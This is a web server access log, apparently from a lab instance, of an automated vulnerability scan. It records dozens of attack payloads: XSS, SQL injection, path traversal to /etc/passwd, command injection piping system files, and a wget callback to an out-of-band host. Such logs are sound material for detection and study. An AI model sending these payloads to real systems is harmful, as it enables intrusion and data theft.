"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"\x0D\x0A\x0D\x0Aextended_version\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxwebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"[{\x22query\x22:\x22query {\x5Cn __typename \x5Cn }\x22}, {\x22query\x22:\x22mutation { \x5Cn __typename \x5Cn }\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-----------------------------20873900192357278038549710136\x0D\x0AContent-Disposition: form-data; name=\x22file1\x22; filename=\x22poc.aspx\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A29KBxhJ7lWIIuwq9YUijbxx7rQc\x0D\x0A-----------------------------20873900192357278038549710136--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../29KBxeAqqgvM8epLR9kJfmbKr3m.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/portalhelp/en/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://ca28bc0smpvbbtig07h0wn1ffnebca3se.oast.pro&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/updraftplus/includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //netcore_get.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /header.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/rss-functions.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KBxeAqqgvM8epLR9kJfmbKr3m.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"_dlg[captcha][target]=system(\x5C'ver\x5C')\x5C","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webmail/basic/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resource/file%3a///etc/passwd/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cpqlogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 